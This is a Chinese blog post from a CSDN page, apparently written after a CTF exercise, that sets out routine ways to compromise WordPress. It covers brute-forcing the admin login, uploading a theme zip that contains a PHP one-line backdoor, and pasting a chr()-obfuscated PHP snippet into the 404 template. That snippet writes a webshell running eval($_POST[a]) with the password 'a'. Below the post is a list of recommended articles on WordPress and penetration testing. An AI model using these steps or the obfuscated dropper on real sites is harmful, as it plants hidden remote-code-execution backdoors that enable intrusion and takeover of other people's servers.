Worldpress常规利用思路

最新推荐文章于 2023-11-20 15:52:29 发布
最新推荐文章于 2023-11-20 15:52:29 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: WEB安全 文章标签: wordpress php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54430466/article/details/115298349
版权

文章目录


worldpress是一款主流的博客系统,但是关于它的漏洞也层出不穷。
这次是因为一次CTF靶场遇到此类情况,顺便做个简单记录。

worldpress系统本身比较安全,但是因为它可以自定义插件,很多时候因为插件作者安全开发的能力有高有低,导致许多安全漏洞的出现。

0x01 弱口令利用链

后台默认地址为:xxxx/wp-admin/

没有验证码可以暴力破解,常见用户名admin,worldpress,system等。

进入后台后的利用:

1 上传主题包getshell

本机建立目录“upkn”,把一句话1.php放进去。打包upkn目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content/themes/upkn/1.php。

2 修改主题文件

“外观”-“编辑”-“404模板
<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件头
点404模板的时候地址栏有相对路径,默认是wp-content/themes/twentyten/404.php
更新完直接访问localhost/wp-content/themes/twentyten/404.php就会在twentyten目录生成一句话后门a.php 密码a

0x02 插件漏洞利用

插件漏洞类型很多,例如xss,sql注入,rce等。

推荐工具方便自查:https://github.com/wpscanteam/wpscan

网络安全练习生
关注
专栏目录
文件上传漏洞利用
m0_61506558的博客
10-09 1520
基于靶场的练习,决定把文件上传漏洞再进行总结,整体可以分为中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞和其他,由于本人水平有限,如有问题,请师傅留言,一起进步!!!(一)基本介绍不理解漏洞原理的,可以看看下面文章哈文件上传漏洞__Cyber的博客-CSDN博客_常见的文件上传漏洞(二)利用思路对文件上传类型进行区分,是属于编辑器文件上传,还是属于第三方应用,还是会员中心。要确保文件上传是什么类型,就用什么类型方法对它进行后期的测试。
【信息收集】——3、信息收集指南
热门推荐
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
ECS云服务器搭建自己的博客网站worldpress
IT呵呵的博客
09-05 3544
     WordPress是使用PHP语言开发的博客平台,在支持PHP和MySQL数据库的服务器上,您可以用WordPress架设自己的网站,也可以用作内容管理系统(CMS)。建站时需要准备域名、空间和程序。使用WordPress镜像创建ECS实例,不需要部署Web环境,解决了空间和程序的问题,只要注册域名,完成备案,网站就可以直接上线,降低了建站的门槛,即买即用。        以下教程是在...
world press简介
黄一舟的专栏
10-26 2899
昨天发现csdn上面写不了文章了,就想找个别的地方写。(我是才开始写的...) 找了半天发现推荐使用World Press的比较多,大概了解了一下,以备不时之需: World Press是一个开源的网络信息发布平台,常用于构建个性化的博客。 他的主页:http://wordpress.org/,现在已经更新到2.8.5版本一个World press中文论坛:http:/
Linux下部署worldPress
人生到处知何似,应似飞鸿踏雪泥。
06-26 995
Linux下部署worldPress简易教程
谷粒商城Wordpress (十二)
qq_29860591的博客
06-05 400
354、kubesphere-进阶-创建WordPress应用-密钥 -356、kubesphere-进阶-创建WordPress应用-外网访问 本地我也安装好了,直接把官网copy一下,写的很详细 WordPress 简介 WordPress 是使用 PHP 开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的环境中架设属于自己的网站。本文以创建...
worldpress小工具自定义html,WorldPress Grid html代码设置浅析,代码非常简洁
weixin_39609423的博客
06-15 277
WorldPressGridhtml代码浅析:首先,多用公共样式里面的标签(h1\h2..p.),无论用了其中的某一个,其定义的样式都是全局的,这样的好处就大大减少了css代码量,网络维护起来可想是多么的方便了.forinstance:h3{margin-top:20px;}其次,值相等里面的margin,padding样式定义的值都是有一定的联系的.forinstance:h3{margin-...
利用Fix Rss Feeds插件修复WordPress的Feed显示错误
10-23
综上所述,本文详细介绍了如何利用Fix Rss Feeds插件修复WordPress中的Feed显示错误。如果读者在实施过程中遇到Feed问题,可以按照本文介绍的方法进行排查和修复。同时也提醒了WordPress用户在进行代码修改或插件...
Wordpress页面生成器:Elementor 插件制作网站页面教程(图文完整)
程序人生
11-17 3357
Wordpress页面生成器:Elementor 插件制作网站页面教程(图文完整)
hackthebox -tenten (考点:wordpress job插件 /图片解密/ ssh2john解密 / )
冬萍子癸水
05-23 588
1 扫描 很常规,22想到可能有ssh登录,80进web搜集信息。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.10 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-23 01:07:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating S
worldpress小工具自定义html,教程 | 用 worldpress 搭建自己的博客 – 小白教程
weixin_42480812的博客
06-15 832
原标题:教程 | 用 worldpress 搭建自己的博客 – 小白教程 「回声」是我们新开设的来稿专栏等待你的来稿 期待你的回声相信很多大一的同学都很想有一个自己的网站吧,反正我是一值想拥有一个网站玩玩,当然对于像我这样的大一小白来说建站看起来好高端哦,今天我就和大家分享自己是如何建立一个自己的博客的。注:这里的域名和云主机仅以腾讯云为例,大家可以自行购买域名和主机方法都是大同小异的。ps 小白...
worldpress 添加网站关键词和描述
03-10 483
worldpress博客默认没有网站关键词和描述,单对于SEO优化来说是不好的,我也在网上找了好多方法终于摸索一个非常简单的方法,不用更改代码和函数,而且还可以对文章进行优化,非常适合想我这样的小白选手,方法如下: 第一步:登录后台,下载一个插件:All in One SEO Pack,具体方法如下图 第二步:关键词配置 点击SEO设置,把提前想好的关键词很描述添加即可。 ...
MassCMS VS WorldPress比较
katsu123456的博客
10-17 200
如果您的企业需要深度定制业务系统,私有化部署,同时需要满足网站,APP以及小程序的预览,并且需要快速的本地化团队的支持,那么您绝对应该选择像MassCMS这样的无头CMS。它将为您的企业节省成本,带来更高的工作效率并且提供更安全的保障。
云虚拟主机worldpress安装教程
hayaqi0504的博客
05-03 1941
https://help.aliyun.com/knowledge_detail/6555043.html?pos=1 1. 请在网上下载最新版本的WordPress程序。本文以WordPress-4.2-zh_CN.zip为例安装 2. 将WordPress程序通过FTP上传到主机上的htdocs目录。 3. 在主机控制台cp.hichina.com将程
WordPress:快速搭建个人网站
ASP.NET
03-25 502
WordPress是用PHP开发的博客平台,通过简单的下载、配置,就可以十分便捷地搭建出一个功能较为齐全且可以较为自由定义的网站,大多数的个人博客都是通过wordpress搭建的。 使用WordPress搭建个人网站十分的便捷,只需要两步:下载和安装。 https://cn.wordpress.org/latest-zh_CN.zip 下载最新版的wordpress,一般我们都直接下载中文版进行使用,在功能上只是对英文版进行了翻译,所以几乎没有什么区别。可以在Windows下载压缩包,..
worldpress(管理员头像) 您可以在Gravatar修改您的资料图片
03-11 6485
worldpress(想修改一下管理员头像),默认的是空的提示 您可以在Gravatar修改您的资料图片。 看来需要去Gravatar上面才行,进去以后速度有点慢,先注册一个吧 很简单创建一个帐号,随便注册一下就可以了。关键应该是从自己网站的链路点进去。 登录成功后点击我的站点 需要登录邮箱激活,等了半天没有看到邮件,后来找了一下在垃圾邮件里面。。 果断激...
wordpress4.9漏洞
小小猪的博客
12-01 8220
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1536
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
渗透测试——漏洞扫描工具
最新发布
wuli1024的博客
11-20 954
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
利用WordPress搭建企业CMS指南
- 利用页面构建器插件,如Elementor或Divi,创建复杂的布局,无需编码知识。 - 创建自定义帖子类型以组织和展示产品、服务、案例研究等内容。 - 配置 WooCommerce 等电子商务插件,搭建在线商店。 - 集成SEO插件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值